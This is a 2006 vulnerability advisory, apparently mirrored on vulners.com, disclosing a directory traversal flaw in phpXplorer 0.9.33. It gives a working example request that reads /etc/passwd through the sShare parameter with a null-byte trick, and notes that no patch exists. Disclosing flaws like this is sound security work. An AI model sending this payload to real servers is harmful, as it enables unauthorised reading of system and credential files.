Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11059
HistoryJan 17, 2006 - 12:00 a.m.

Directory traversal in phpXplorer

2006-01-1700:00:00
vulners.com
13

==========================================================
Title: Directory traversal in phpXplorer

Application: phpXplorer
Vendor: http://www.phpxplorer.org
Vulnerable Versions: 0.9.33
Bug: directory traversal
Date: 16-January-2006
Author: Oriol Torrent Santiago < oriol.torrent.AT.gmail.com >

References:
http://www.arrelnet.com/advisories/adv20060116.html

==========================================================

1) Background

phpXplorer is an open source file management system written in PHP.
It enables you to work on a remote file system through a web browser.

2) Problem description

An attacker can read arbitrary files outside the web root by sending
specially formed requests

Ex:

http://host/phpXplorer/system/workspaces.php?sShare=../../../../../../../../etc/passwd&#37;00&amp;ref=1

3) Solution:

No Patch available.

4) Timeline

17/12/2005 Bug discovered
20/12/2005 Vendor receives detailed advisory. No response
04/01/2006 Second notification. No response
16/01/2006 Public Disclosure